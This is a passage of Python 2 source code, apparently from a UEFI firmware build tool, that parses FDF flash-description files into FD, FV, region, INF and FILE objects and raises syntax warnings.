# @retval True Successfully find the string, file buffer pointer moved forward
# @retval False Not able to find the string, file buffer pointer not changed
#
def __SkipToToken(self, String, IgnoreCase = False):
StartPos = self.GetFileBufferPos()
self.__SkippedChars = ""
while not self.__EndOfFile():
index = -1
if IgnoreCase:
index = self.__CurrentLine()[self.CurrentOffsetWithinLine : ].upper().find(String.upper())
else:
index = self.__CurrentLine()[self.CurrentOffsetWithinLine : ].find(String)
if index == 0:
self.CurrentOffsetWithinLine += len(String)
self.__SkippedChars += String
return True
self.__SkippedChars += str(self.__CurrentChar())
self.__GetOneChar()
self.SetFileBufferPos( StartPos)
self.__SkippedChars = ""
return False
## GetFileBufferPos() method
#
# Return the tuple of current line and offset within the line
#
# @param self The object pointer
# @retval Tuple Line number and offset pair
#
def GetFileBufferPos(self):
return (self.CurrentLineNumber, self.CurrentOffsetWithinLine)
## SetFileBufferPos() method
#
# Restore the file buffer position
#
# @param self The object pointer
# @param Pos The new file buffer position
#
def SetFileBufferPos(self, Pos):
(self.CurrentLineNumber, self.CurrentOffsetWithinLine) = Pos
## ParseFile() method
#
# Parse the file profile buffer to extract fd, fv ... information
# Exception will be raised if syntax error found
#
# @param self The object pointer
#
def ParseFile(self):
try:
self.__StringToList()
self.PreprocessFile()
self.PreprocessIncludeFile()
self.__StringToList()
self.PreprocessFile()
self.PreprocessConditionalStatement()
self.__StringToList()
for Pos in self.__WipeOffArea:
self.__ReplaceFragment(Pos[0], Pos[1])
self.Profile.FileLinesList = ["".join(list) for list in self.Profile.FileLinesList]
while self.__GetDefines():
pass
Index = 0
while Index < len(self.Profile.FileLinesList):
FileLineTuple = GetRealFileLine(self.FileName, Index + 1)
self.Profile.FileLinesList[Index] = self.__ReplaceMacros(self.Profile.FileLinesList[Index], FileLineTuple[0], FileLineTuple[1])
Index += 1
while self.__GetFd():
pass
while self.__GetFv():
pass
while self.__GetCapsule():
pass
# while self.__GetVtf():
# pass
#
# while self.__GetRule():
# pass
except Warning, X:
self.__UndoToken()
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
X.message += '\nGot Token: \"%s\" from File %s\n' % (self.__Token, FileLineTuple[0]) + \
'Previous Token: \"%s\" At line: %d, Offset Within Line: %d\n' \
% (self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine :].rstrip('\n').rstrip('\r'), FileLineTuple[1], self.CurrentOffsetWithinLine)
raise
## __GetDefines() method
#
# Get Defines section contents and store its data into AllMacrosList
#
# @param self The object pointer
# @retval True Successfully find a Defines
# @retval False Not able to find a Defines
#
def __GetDefines(self):
if not self.__GetNextToken():
return False
S = self.__Token.upper()
if S.startswith("[") and not S.startswith("[DEFINES"):
if not S.startswith("[FD.") and not S.startswith("[FV.") and not S.startswith("[CAPSULE.") \
and not S.startswith("[VTF.") and not S.startswith("[RULE.") and not S.startswith("[OPTIONROM."):
raise Warning("Unknown section or section appear sequence error (The correct sequence should be [DEFINES], [FD.], [FV.], [Capsule.], [VTF.], [Rule.], [OptionRom.])", self.FileName, self.CurrentLineNumber)
self.__UndoToken()
return False
self.__UndoToken()
if not self.__IsToken("[DEFINES", True):
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
#print 'Parsing String: %s in File %s, At line: %d, Offset Within Line: %d' \
# % (self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine :], FileLineTuple[0], FileLineTuple[1], self.CurrentOffsetWithinLine)
raise Warning("expected [DEFINES", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "]"):
raise Warning("expected ']'", self.FileName, self.CurrentLineNumber)
while self.__GetNextWord():
Macro = self.__Token
if not self.__IsToken("="):
raise Warning("expected '='", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken() or self.__Token.startswith('['):
raise Warning("expected MACRO value", self.FileName, self.CurrentLineNumber)
Value = self.__Token
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
MacProfile = MacroProfile(FileLineTuple[0], FileLineTuple[1])
MacProfile.MacroName = Macro
MacProfile.MacroValue = Value
AllMacroList.append(MacProfile)
return False
## __GetFd() method
#
# Get FD section contents and store its data into FD dictionary of self.Profile
#
# @param self The object pointer
# @retval True Successfully find a FD
# @retval False Not able to find a FD
#
def __GetFd(self):
if not self.__GetNextToken():
return False
S = self.__Token.upper()
if S.startswith("[") and not S.startswith("[FD."):
if not S.startswith("[FV.") and not S.startswith("[CAPSULE.") \
and not S.startswith("[VTF.") and not S.startswith("[RULE."):
raise Warning("Unknown section At Line ", self.FileName, self.CurrentLineNumber)
self.__UndoToken()
return False
self.__UndoToken()
if not self.__IsToken("[FD.", True):
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
print 'Parsing String: %s in File %s, At line: %d, Offset Within Line: %d' \
% (self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine :], FileLineTuple[0], FileLineTuple[1], self.CurrentOffsetWithinLine)
raise Warning("expected [FD.] At Line ", self.FileName, self.CurrentLineNumber)
FdName = self.__GetUiName()
self.CurrentFdName = FdName.upper()
if not self.__IsToken( "]"):
raise Warning("expected ']' At Line ", self.FileName, self.CurrentLineNumber)
FdObj = CommonDataClass.FdfClass.FDClassObject()
FdObj.FdUiName = self.CurrentFdName
self.Profile.FdDict[self.CurrentFdName] = FdObj
Status = self.__GetCreateFile(FdObj)
if not Status:
raise Warning("FD name error At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetTokenStatements(FdObj):
return False
self.__GetDefineStatements(FdObj)
self.__GetSetStatements(FdObj)
if not self.__GetRegionLayout(FdObj):
raise Warning("expected region layout At Line ", self.FileName, self.CurrentLineNumber)
while self.__GetRegionLayout(FdObj):
pass
return True
## __GetUiName() method
#
# Return the UI name of a section
#
# @param self The object pointer
# @retval FdName UI name
#
def __GetUiName(self):
FdName = ""
if self.__GetNextWord():
FdName = self.__Token
return FdName
## __GetCreateFile() method
#
# Return the output file name of object
#
# @param self The object pointer
# @param Obj object whose data will be stored in file
# @retval FdName UI name
#
def __GetCreateFile(self, Obj):
if self.__IsKeyword( "CREATE_FILE"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected file name At Line ", self.FileName, self.CurrentLineNumber)
FileName = self.__Token
Obj.CreateFileName = FileName
return True
## __GetTokenStatements() method
#
# Get token statements
#
# @param self The object pointer
# @param Obj for whom token statement is got
# @retval True Successfully find a token statement
# @retval False Not able to find a token statement
#
def __GetTokenStatements(self, Obj):
if not self.__IsKeyword( "BaseAddress"):
raise Warning("BaseAddress missing At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextHexNumber():
raise Warning("expected Hex base address At Line ", self.FileName, self.CurrentLineNumber)
Obj.BaseAddress = self.__Token
if self.__IsToken( "|"):
pcdPair = self.__GetNextPcdName()
Obj.BaseAddressPcd = pcdPair
self.Profile.PcdDict[pcdPair] = long(Obj.BaseAddress, 0)
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
self.Profile.PcdFileLineDict[pcdPair] = FileLineTuple
if not self.__IsKeyword( "Size"):
raise Warning("Size missing At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextHexNumber():
raise Warning("expected Hex size At Line ", self.FileName, self.CurrentLineNumber)
Obj.Size = long(self.__Token, 0)
if self.__IsToken( "|"):
pcdPair = self.__GetNextPcdName()
Obj.SizePcd = pcdPair
self.Profile.PcdDict[pcdPair] = Obj.Size
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
self.Profile.PcdFileLineDict[pcdPair] = FileLineTuple
if not self.__IsKeyword( "ErasePolarity"):
raise Warning("ErasePolarity missing At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Erase Polarity At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token != "1" and self.__Token != "0":
raise Warning("expected 1 or 0 Erase Polarity At Line ", self.FileName, self.CurrentLineNumber)
Obj.ErasePolarity = self.__Token
Status = self.__GetBlockStatements(Obj)
return Status
## __GetAddressStatements() method
#
# Get address statements
#
# @param self The object pointer
# @param Obj for whom address statement is got
# @retval True Successfully find
# @retval False Not able to find
#
def __GetAddressStatements(self, Obj):
if self.__IsKeyword("BsBaseAddress"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextDecimalNumber() and not self.__GetNextHexNumber():
raise Warning("expected address At Line ", self.FileName, self.CurrentLineNumber)
BsAddress = long(self.__Token, 0)
Obj.BsBaseAddress = BsAddress
if self.__IsKeyword("RtBaseAddress"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextDecimalNumber() and not self.__GetNextHexNumber():
raise Warning("expected address At Line ", self.FileName, self.CurrentLineNumber)
RtAddress = long(self.__Token, 0)
Obj.RtBaseAddress = RtAddress
## __GetBlockStatements() method
#
# Get block statements
#
# @param self The object pointer
# @param Obj for whom block statement is got
# @retval True Successfully find
# @retval False Not able to find
#
def __GetBlockStatements(self, Obj):
if not self.__GetBlockStatement(Obj):
#set default block size is 1
Obj.BlockSizeList.append((1, Obj.Size, None))
return True
while self.__GetBlockStatement(Obj):
pass
for Item in Obj.BlockSizeList:
if Item[0] == None or Item[1] == None:
raise Warning("expected block statement for Fd Section", self.FileName, self.CurrentLineNumber)
return True
## __GetBlockStatement() method
#
# Get block statement
#
# @param self The object pointer
# @param Obj for whom block statement is got
# @retval True Successfully find
# @retval False Not able to find
#
def __GetBlockStatement(self, Obj):
if not self.__IsKeyword( "BlockSize"):
return False
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextHexNumber() and not self.__GetNextDecimalNumber():
raise Warning("expected Hex block size At Line ", self.FileName, self.CurrentLineNumber)
BlockSize = long(self.__Token, 0)
BlockSizePcd = None
if self.__IsToken( "|"):
PcdPair = self.__GetNextPcdName()
BlockSizePcd = PcdPair
self.Profile.PcdDict[PcdPair] = BlockSize
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
self.Profile.PcdFileLineDict[pcdPair] = FileLineTuple
BlockNumber = None
if self.__IsKeyword( "NumBlocks"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextDecimalNumber() and not self.__GetNextHexNumber():
raise Warning("expected block numbers At Line ", self.FileName, self.CurrentLineNumber)
BlockNumber = long(self.__Token, 0)
Obj.BlockSizeList.append((BlockSize, BlockNumber, BlockSizePcd))
return True
## __GetDefineStatements() method
#
# Get define statements
#
# @param self The object pointer
# @param Obj for whom define statement is got
# @retval True Successfully find
# @retval False Not able to find
#
def __GetDefineStatements(self, Obj):
while self.__GetDefineStatement( Obj):
pass
## __GetDefineStatement() method
#
# Get define statement
#
# @param self The object pointer
# @param Obj for whom define statement is got
# @retval True Successfully find
# @retval False Not able to find
#
def __GetDefineStatement(self, Obj):
if self.__IsKeyword("DEFINE"):
self.__GetNextToken()
Macro = self.__Token
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected value At Line ", self.FileName, self.CurrentLineNumber)
Value = self.__Token
Macro = '$(' + Macro + ')'
Obj.DefineVarDict[Macro] = Value
return True
return False
## __GetSetStatements() method
#
# Get set statements
#
# @param self The object pointer
# @param Obj for whom set statement is got
# @retval True Successfully find
# @retval False Not able to find
#
def __GetSetStatements(self, Obj):
while self.__GetSetStatement(Obj):
pass
## __GetSetStatement() method
#
# Get set statement
#
# @param self The object pointer
# @param Obj for whom set statement is got
# @retval True Successfully find
# @retval False Not able to find
#
def __GetSetStatement(self, Obj):
if self.__IsKeyword("SET"):
PcdPair = self.__GetNextPcdName()
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected value At Line ", self.FileName, self.CurrentLineNumber)
Value = self.__Token
if Value.startswith("{"):
# deal with value with {}
if not self.__SkipToToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
Value += self.__SkippedChars
Obj.SetVarDict[PcdPair] = Value
self.Profile.PcdDict[PcdPair] = Value
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
self.Profile.PcdFileLineDict[PcdPair] = FileLineTuple
return True
return False
## __GetRegionLayout() method
#
# Get region layout for FD
#
# @param self The object pointer
# @param Fd for whom region is got
# @retval True Successfully find
# @retval False Not able to find
#
def __GetRegionLayout(self, Fd):
if not self.__GetNextHexNumber():
return False
RegionObj = CommonDataClass.FdfClass.RegionClassObject()
RegionObj.Offset = long(self.__Token, 0)
Fd.RegionList.append(RegionObj)
if not self.__IsToken( "|"):
raise Warning("expected '|' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextHexNumber():
raise Warning("expected Region Size At Line ", self.FileName, self.CurrentLineNumber)
RegionObj.Size = long(self.__Token, 0)
if not self.__GetNextWord():
return True
if not self.__Token in ("SET", "FV", "FILE", "DATA", "CAPSULE"):
self.__UndoToken()
RegionObj.PcdOffset = self.__GetNextPcdName()
self.Profile.PcdDict[RegionObj.PcdOffset] = RegionObj.Offset + long(Fd.BaseAddress, 0)
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
self.Profile.PcdFileLineDict[RegionObj.PcdOffset] = FileLineTuple
if self.__IsToken( "|"):
RegionObj.PcdSize = self.__GetNextPcdName()
self.Profile.PcdDict[RegionObj.PcdSize] = RegionObj.Size
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
self.Profile.PcdFileLineDict[RegionObj.PcdSize] = FileLineTuple
if not self.__GetNextWord():
return True
if self.__Token == "SET":
self.__UndoToken()
self.__GetSetStatements( RegionObj)
if not self.__GetNextWord():
return True
elif self.__Token == "FV":
self.__UndoToken()
self.__GetRegionFvType( RegionObj)
elif self.__Token == "CAPSULE":
self.__UndoToken()
self.__GetRegionCapType( RegionObj)
elif self.__Token == "FILE":
self.__UndoToken()
self.__GetRegionFileType( RegionObj)
else:
self.__UndoToken()
self.__GetRegionDataType( RegionObj)
return True
## __GetRegionFvType() method
#
# Get region fv data for region
#
# @param self The object pointer
# @param RegionObj for whom region data is got
#
def __GetRegionFvType(self, RegionObj):
if not self.__IsKeyword( "FV"):
raise Warning("expected Keyword 'FV' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected FV name At Line ", self.FileName, self.CurrentLineNumber)
RegionObj.RegionType = "FV"
RegionObj.RegionDataList.append(self.__Token)
while self.__IsKeyword( "FV"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected FV name At Line ", self.FileName, self.CurrentLineNumber)
RegionObj.RegionDataList.append(self.__Token)
## __GetRegionCapType() method
#
# Get region capsule data for region
#
# @param self The object pointer
# @param RegionObj for whom region data is got
#
def __GetRegionCapType(self, RegionObj):
if not self.__IsKeyword("CAPSULE"):
raise Warning("expected Keyword 'CAPSULE' at line", self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' at line", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected CAPSULE name at line", self.FileName, self.CurrentLineNumber)
RegionObj.RegionType = "CAPSULE"
RegionObj.RegionDataList.append(self.__Token)
while self.__IsKeyword("CAPSULE"):
if not self.__IsToken("="):
raise Warning("expected '=' at line", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected CAPSULE name at line", self.FileName, self.CurrentLineNumber)
RegionObj.RegionDataList.append(self.__Token)
## __GetRegionFileType() method
#
# Get region file data for region
#
# @param self The object pointer
# @param RegionObj for whom region data is got
#
def __GetRegionFileType(self, RegionObj):
if not self.__IsKeyword( "FILE"):
raise Warning("expected Keyword 'FILE' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected File name At Line ", self.FileName, self.CurrentLineNumber)
RegionObj.RegionType = "FILE"
RegionObj.RegionDataList.append( self.__Token)
while self.__IsKeyword( "FILE"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected FILE name At Line ", self.FileName, self.CurrentLineNumber)
RegionObj.RegionDataList.append(self.__Token)
## __GetRegionDataType() method
#
# Get region array data for region
#
# @param self The object pointer
# @param RegionObj for whom region data is got
#
def __GetRegionDataType(self, RegionObj):
if not self.__IsKeyword( "DATA"):
raise Warning("expected Region Data type At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "{"):
raise Warning("expected '{' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextHexNumber():
raise Warning("expected Hex byte At Line ", self.FileName, self.CurrentLineNumber)
if len(self.__Token) > 18:
raise Warning("Hex string can't be converted to a valid UINT64 value", self.FileName, self.CurrentLineNumber)
DataString = self.__Token
DataString += ","
while self.__IsToken(","):
if not self.__GetNextHexNumber():
raise Warning("Invalid Hex number At Line ", self.FileName, self.CurrentLineNumber)
if len(self.__Token) > 4:
raise Warning("Hex byte(must be 2 digits) too long At Line ", self.FileName, self.CurrentLineNumber)
DataString += self.__Token
DataString += ","
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
DataString = DataString.rstrip(",")
RegionObj.RegionType = "DATA"
RegionObj.RegionDataList.append( DataString)
while self.__IsKeyword( "DATA"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "{"):
raise Warning("expected '{' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextHexNumber():
raise Warning("expected Hex byte At Line ", self.FileName, self.CurrentLineNumber)
if len(self.__Token) > 18:
raise Warning("Hex string can't be converted to a valid UINT64 value", self.FileName, self.CurrentLineNumber)
DataString = self.__Token
DataString += ","
while self.__IsToken(","):
self.__GetNextHexNumber()
if len(self.__Token) > 4:
raise Warning("Hex byte(must be 2 digits) too long At Line ", self.FileName, self.CurrentLineNumber)
DataString += self.__Token
DataString += ","
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
DataString = DataString.rstrip(",")
RegionObj.RegionDataList.append( DataString)
## __GetFv() method
#
# Get FV section contents and store its data into FV dictionary of self.Profile
#
# @param self The object pointer
# @retval True Successfully find a FV
# @retval False Not able to find a FV
#
def __GetFv(self):
if not self.__GetNextToken():
return False
S = self.__Token.upper()
if S.startswith("[") and not S.startswith("[FV."):
if not S.startswith("[CAPSULE.") \
and not S.startswith("[VTF.") and not S.startswith("[RULE."):
raise Warning("Unknown section or section appear sequence error \n(The correct sequence should be [FD.], [FV.], [Capsule.], [VTF.], [Rule.]) At Line ", self.FileName, self.CurrentLineNumber)
self.__UndoToken()
return False
self.__UndoToken()
if not self.__IsToken("[FV.", True):
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
print 'Parsing String: %s in File %s, At line: %d, Offset Within Line: %d' \
% (self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine :], FileLineTuple[0], FileLineTuple[1], self.CurrentOffsetWithinLine)
raise Warning("Unknown Keyword At Line ", self.FileName, self.CurrentLineNumber)
FvName = self.__GetUiName()
self.CurrentFvName = FvName.upper()
if not self.__IsToken( "]"):
raise Warning("expected ']' At Line ", self.FileName, self.CurrentLineNumber)
FvObj = CommonDataClass.FdfClass.FvClassObject()
FvObj.UiFvName = self.CurrentFvName
self.Profile.FvDict[self.CurrentFvName] = FvObj
Status = self.__GetCreateFile(FvObj)
if not Status:
raise Warning("FV name error At Line ", self.FileName, self.CurrentLineNumber)
self.__GetDefineStatements(FvObj)
self.__GetAddressStatements(FvObj)
self.__GetBlockStatement(FvObj)
self.__GetSetStatements(FvObj)
self.__GetFvAlignment(FvObj)
self.__GetFvAttributes(FvObj)
self.__GetFvNameGuid(FvObj)
self.__GetAprioriSection(FvObj, FvObj.DefineVarDict.copy())
self.__GetAprioriSection(FvObj, FvObj.DefineVarDict.copy())
while True:
isInf = self.__GetInfStatement(FvObj, MacroDict = FvObj.DefineVarDict.copy())
isFile = self.__GetFileStatement(FvObj, MacroDict = FvObj.DefineVarDict.copy())
if not isInf and not isFile:
break
return True
## __GetFvAlignment() method
#
# Get alignment for FV
#
# @param self The object pointer
# @param Obj for whom alignment is got
# @retval True Successfully find a alignment statement
# @retval False Not able to find a alignment statement
#
def __GetFvAlignment(self, Obj):
if not self.__IsKeyword( "FvAlignment"):
return False
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected alignment value At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token.upper() not in ("1", "2", "4", "8", "16", "32", "64", "128", "256", "512", \
"1K", "2K", "4K", "8K", "16K", "32K", "64K", "128K", "256K", "512K", \
"1M", "2M", "4M", "8M", "16M", "32M", "64M", "128M", "256M", "512M", \
"1G", "2G"):
raise Warning("Unknown alignment value At Line ", self.FileName, self.CurrentLineNumber)
Obj.FvAlignment = self.__Token
return True
## __GetFvAttributes() method
#
# Get attributes for FV
#
# @param self The object pointer
# @param Obj for whom attribute is got
# @retval None
#
def __GetFvAttributes(self, FvObj):
while self.__GetNextWord():
name = self.__Token
if name not in ("ERASE_POLARITY", "MEMORY_MAPPED", \
"STICKY_WRITE", "LOCK_CAP", "LOCK_STATUS", "WRITE_ENABLED_CAP", \
"WRITE_DISABLED_CAP", "WRITE_STATUS", "READ_ENABLED_CAP", \
"READ_DISABLED_CAP", "READ_STATUS", "READ_LOCK_CAP", \
"READ_LOCK_STATUS", "WRITE_LOCK_CAP", "WRITE_LOCK_STATUS", \
"WRITE_POLICY_RELIABLE"):
self.__UndoToken()
return
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken() or self.__Token.upper() not in ("TRUE", "FALSE", "1", "0"):
raise Warning("expected TRUE/FALSE (1/0) At Line ", self.FileName, self.CurrentLineNumber)
FvObj.FvAttributeDict[name] = self.__Token
return
## __GetFvNameGuid() method
#
# Get FV GUID for FV
#
# @param self The object pointer
# @param Obj for whom GUID is got
# @retval None
#
def __GetFvNameGuid(self, FvObj):
if not self.__IsKeyword( "FvNameGuid"):
return
if not self.__IsToken( "="):
raise Warning("expected '='", self.FileName, self.CurrentLineNumber)
if not self.__GetNextGuid():
raise Warning("expected FV GUID value", self.FileName, self.CurrentLineNumber)
FvObj.FvNameGuid = self.__Token
return
## __GetAprioriSection() method
#
# Get token statements
#
# @param self The object pointer
# @param FvObj for whom apriori is got
# @param MacroDict dictionary used to replace macro
# @retval True Successfully find apriori statement
# @retval False Not able to find apriori statement
#
def __GetAprioriSection(self, FvObj, MacroDict = {}):
if not self.__IsKeyword( "APRIORI"):
return False
if not self.__IsKeyword("PEI") and not self.__IsKeyword("DXE"):
raise Warning("expected Apriori file type At Line ", self.FileName, self.CurrentLineNumber)
AprType = self.__Token
if not self.__IsToken( "{"):
raise Warning("expected '{' At Line ", self.FileName, self.CurrentLineNumber)
AprSectionObj = CommonDataClass.FdfClass.AprioriSectionClassObject()
AprSectionObj.AprioriType = AprType
self.__GetDefineStatements(AprSectionObj)
MacroDict.update(AprSectionObj.DefineVarDict)
while True:
IsInf = self.__GetInfStatement( AprSectionObj, MacroDict = MacroDict)
IsFile = self.__GetFileStatement( AprSectionObj)
if not IsInf and not IsFile:
break
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
FvObj.AprioriSectionList.append(AprSectionObj)
return True
## __GetInfStatement() method
#
# Get INF statements
#
# @param self The object pointer
# @param Obj for whom inf statement is got
# @param MacroDict dictionary used to replace macro
# @retval True Successfully find inf statement
# @retval False Not able to find inf statement
#
def __GetInfStatement(self, Obj, ForCapsule = False, MacroDict = {}):
if not self.__IsKeyword( "INF"):
return False
ffsInf = CommonDataClass.FdfClass.FfsInfStatementClassObject()
self.__GetInfOptions( ffsInf)
if not self.__GetNextToken():
raise Warning("expected INF file path At Line ", self.FileName, self.CurrentLineNumber)
ffsInf.InfFileName = self.__Token
# if ffsInf.InfFileName.find('$') >= 0:
# ffsInf.InfFileName = GenFdsGlobalVariable.GenFdsGlobalVariable.MacroExtend(ffsInf.InfFileName, MacroDict)
if not ffsInf.InfFileName in self.Profile.InfList:
self.Profile.InfList.append(ffsInf.InfFileName)
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
self.Profile.InfFileLineList.append(FileLineTuple)
if self.__IsToken('|'):
if self.__IsKeyword('RELOCS_STRIPPED'):
ffsInf.KeepReloc = False
elif self.__IsKeyword('RELOCS_RETAINED'):
ffsInf.KeepReloc = True
else:
raise Warning("Unknown reloc strip flag At Line ", self.FileName, self.CurrentLineNumber)
if ForCapsule:
capsuleFfs = CapsuleData.CapsuleFfs()
capsuleFfs.Ffs = ffsInf
Obj.CapsuleDataList.append(capsuleFfs)
else:
Obj.FfsList.append(ffsInf)
return True
## __GetInfOptions() method
#
# Get options for INF
#
# @param self The object pointer
# @param FfsInfObj for whom option is got
#
def __GetInfOptions(self, FfsInfObj):
if self.__IsKeyword( "RuleOverride"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Rule name At Line ", self.FileName, self.CurrentLineNumber)
FfsInfObj.Rule = self.__Token
if self.__IsKeyword( "VERSION"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Version At Line ", self.FileName, self.CurrentLineNumber)
if self.__GetStringData():
FfsInfObj.Version = self.__Token
if self.__IsKeyword( "UI"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected UI name At Line ", self.FileName, self.CurrentLineNumber)
if self.__GetStringData():
FfsInfObj.Ui = self.__Token
if self.__IsKeyword( "USE"):
if not self.__IsToken( "="):
raise Warning("expected '='", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected ARCH name", self.FileName, self.CurrentLineNumber)
FfsInfObj.UseArch = self.__Token
if self.__GetNextToken():
p = re.compile(r'([a-zA-Z0-9\-]+|\$\(TARGET\)|\*)_([a-zA-Z0-9\-]+|\$\(TOOL_CHAIN_TAG\)|\*)_([a-zA-Z0-9\-]+|\$\(ARCH\)|\*)')
if p.match(self.__Token):
FfsInfObj.KeyStringList.append(self.__Token)
if not self.__IsToken(","):
return
else:
self.__UndoToken()
return
while self.__GetNextToken():
if not p.match(self.__Token):
raise Warning("expected KeyString \"Target_Tag_Arch\" At Line ", self.FileName, self.CurrentLineNumber)
FfsInfObj.KeyStringList.append(self.__Token)
if not self.__IsToken(","):
break
## __GetFileStatement() method
#
# Get FILE statements
#
# @param self The object pointer
# @param Obj for whom FILE statement is got
# @param MacroDict dictionary used to replace macro
# @retval True Successfully find FILE statement
# @retval False Not able to find FILE statement
#
def __GetFileStatement(self, Obj, ForCapsule = False, MacroDict = {}):
if not self.__IsKeyword( "FILE"):
return False
FfsFileObj = CommonDataClass.FdfClass.FileStatementClassObject()
if not self.__GetNextWord():
raise Warning("expected FFS type At Line ", self.FileName, self.CurrentLineNumber)
FfsFileObj.FvFileType = self.__Token
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextGuid():
if not self.__GetNextWord():
raise Warning("expected File GUID", self.FileName, self.CurrentLineNumber)
if self.__Token == 'PCD':
if not self.__IsToken( "("):
raise Warning("expected '('", self.FileName, self.CurrentLineNumber)
PcdPair = self.__GetNextPcdName()
if not self.__IsToken( ")"):
raise Warning("expected ')'", self.FileName, self.CurrentLineNumber)
self.__Token = 'PCD('+PcdPair[1]+'.'+PcdPair[0]+')'
FfsFileObj.NameGuid = self.__Token
self.__GetFilePart( FfsFileObj, MacroDict.copy())
if ForCapsule:
capsuleFfs = CapsuleData.CapsuleFfs()
capsuleFfs.Ffs = FfsFileObj
Obj.CapsuleDataList.append(capsuleFfs)
else:
Obj.FfsList.append(FfsFileObj)
return True
## __FileCouldHaveRelocFlag() method
#
# Check whether reloc strip flag can be set for a file type.
#
# @param self The object pointer
# @param FileType The file type to check with
# @retval True This type could have relocation strip flag
# @retval False No way to have it
#
def __FileCouldHaveRelocFlag (self, FileType):
if FileType in ('SEC', 'PEI_CORE', 'PEIM', 'PEI_DXE_COMBO'):
return True
else:
return False
## __SectionCouldHaveRelocFlag() method
#
# Check whether reloc strip flag can be set for a section type.
#
# @param self The object pointer
# @param SectionType The section type to check with
# @retval True This type could have relocation strip flag
# @retval False No way to have it
#
def __SectionCouldHaveRelocFlag (self, SectionType):
